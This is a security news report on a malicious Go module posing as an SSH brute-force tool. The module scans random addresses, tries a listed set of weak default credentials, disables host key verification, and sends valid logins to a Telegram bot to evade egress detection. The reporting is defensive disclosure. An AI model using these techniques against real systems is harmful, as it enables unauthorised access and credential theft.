Cybersecurity experts have identified a malicious Go module that disguises itself as an SSH brute-force tool but secretly transmits stolen credentials to its operator.
According to researcher Kirill Boychenko from Socket, the package immediately sends the victim’s IP address, username, and password to a hardcoded Telegram bot upon the first successful login.
The module, named “golang-random-ip-ssh-bruteforce”, was linked to a GitHub profile known as IllDieAnyway (G3TT), which has since been removed. Despite this, the package remains available on pkg.go[.]dev and was originally published on June 24, 2022.
The malicious tool scans random IPv4 addresses for exposed SSH services on TCP port 22, attempts brute-force logins using an embedded wordlist, and then forwards any successful credentials to the attacker’s Telegram bot.
A concerning element of the malware is its deliberate disabling of host key verification by using the “ssh.InsecureIgnoreHostKey” setting. This makes the SSH client accept connections from any server, regardless of authenticity.
The built-in wordlist is minimal, containing only two usernames (root, admin) paired with weak passwords such as root, test, password, admin, 12345678, 1234, qwerty, webadmin, webmaster, techsupport, letmein, and Passw@rd.
The malware runs in a continuous loop, generating IPv4 addresses and attempting concurrent SSH logins. Stolen details are sent to the attacker’s Telegram bot “@sshZXC_bot”, which then passes them to the account “@io_ping” (Gett) for collection.
Archived snapshots of the deleted GitHub account show that the threat actor’s portfolio included an IP port scanner, an Instagram parser, and a PHP-based C2 botnet named Selica-C2.
The same individual’s YouTube channel is still active, hosting videos on topics such as “How to hack a Telegram bot” and a so-called “SMS bomber” tool for Russia, capable of sending spam messages to VK users through Telegram bots. Evidence suggests the operator is of Russian origin.
Boychenko noted that the malware cleverly shifts risk to users by making them unknowingly perform the scanning and brute-force attempts. The captured data is funneled into the attacker’s single Telegram bot. With host key verification disabled, high concurrency enabled, and immediate exit after the first valid login, the malware is designed for fast credential harvesting.
Additionally, since Telegram Bot API traffic uses HTTPS, the exfiltration process resembles normal web traffic, which allows it to evade basic egress detection.
